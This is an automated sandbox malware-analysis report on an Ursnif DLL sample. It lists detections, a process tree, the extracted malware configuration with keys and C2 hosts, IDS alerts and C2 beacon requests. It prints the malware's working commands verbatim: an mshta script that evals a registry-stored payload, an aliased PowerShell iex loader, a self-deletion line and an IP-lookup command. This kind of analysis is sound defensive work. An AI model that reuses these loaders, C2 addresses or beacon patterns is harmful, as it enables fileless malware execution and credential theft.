Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HxEWwh74qT

Overview

General Information

Sample Name:HxEWwh74qT (renamed file extension from none to dll)
Analysis ID:613862
MD5:5d2b5cbd8a574c9e35309e21ecf93a0e
SHA1:c15e583e28556f5d187197937b4d2a715ebf8ca7
SHA256:52d14c9cd56aa41ba98a24a4a3dc3674f7e281c3d79f6aca141382fb56585bcd
Tags:32dllexe
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7080 cmdline: loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 7124 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7148 cmdline: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6020 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 3380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6304 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6932 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6432 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5516 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3808 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 3904 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6948 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4184 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6652 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.4de0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              3.3.rundll32.exe.5456940.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.3.rundll32.exe.53aa4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.3.rundll32.exe.53aa4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.4c794a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Windows Shell File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 6304, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Sigma detected: Accessing WinAPI in PowerShell. Code Injection
                      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6932, StartAddress: DBEB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3808
                      Sigma detected: Suspicious Remote Thread Created
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6932, StartAddress: DBEB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3808
                      Sigma detected: MSHTA Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6932, ProcessName: powershell.exe
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7124, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1, ProcessId: 7148, ProcessName: rundll32.exe
                      Sigma detected: Mshta Spawning Windows Shell
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6932, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6932, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline, ProcessId: 6024, ProcessName: csc.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6932, TargetFilename: C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                      Source: Process startedAuthor: frack113: Data: Command: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3808, ParentProcessName: explorer.exe, ProcessCommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", ProcessId: 6652, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6304, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6932, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3808, ParentProcessName: explorer.exe, ProcessCommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1", ProcessId: 6652, ProcessName: cmd.exe
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132951400462253769.6932.DefaultAppDomain.powershell
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6932, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5012, ProcessName: conhost.exe

                      Snort Signatures

                      Timestamp:04/22/22-15:27:17.806871 04/22/22-15:27:17.806871
                      SID:2033203
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/22/22-15:27:18.629540 04/22/22-15:27:18.629540
                      SID:2033203
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/22/22-15:26:57.401743 04/22/22-15:26:57.401743
                      SID:2033203
                      Source Port:49771
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/22/22-15:27:19.716505 04/22/22-15:27:19.716505
                      SID:2033204
                      Source Port:49775
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: HxEWwh74qT.dllVirustotal: Detection: 36%Perma Link
                      Source: HxEWwh74qT.dllReversingLabs: Detection: 30%
                      Machine Learning detection for sample
                      Source: HxEWwh74qT.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_04DE3072
                      Source: HxEWwh74qT.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.390436792.0000000000480000.00000002.00000001.01000000.00000003.sdmp, HxEWwh74qT.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp

                      Networking

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49771 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49771 -> 13.107.43.16:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.7:49775 -> 146.70.35.138:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.7:49775 -> 146.70.35.138:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80Jump to behavior
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                      Source: global trafficHTTP traffic detected: GET /phpadmin/amEwUCMy/zQvTSnELMCHIJfWA9A7NF2J/B_2FgTN3w5/bDUz7M_2FQ_2FvsyQ/_2FoZnlV0ztm/G4pVInXE2v2/3DjsF_2BN_2F7_/2FqxWA7q0ZWwUgJ9q_2B6/oG7o48SwKb_2FuN4/koQCfS1rrGeWSn9/gvwn1WY7oRq54G3QzL/QoP8Nx_2F/m8EC_2FPKp_2B2QIRT4a/hKoi_2FT5FiIh7mNlS7/jciRuxpI3KdaM19hmR8F9V/NOK7C_2BauAdB/emv_2BixRfY4926/zZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
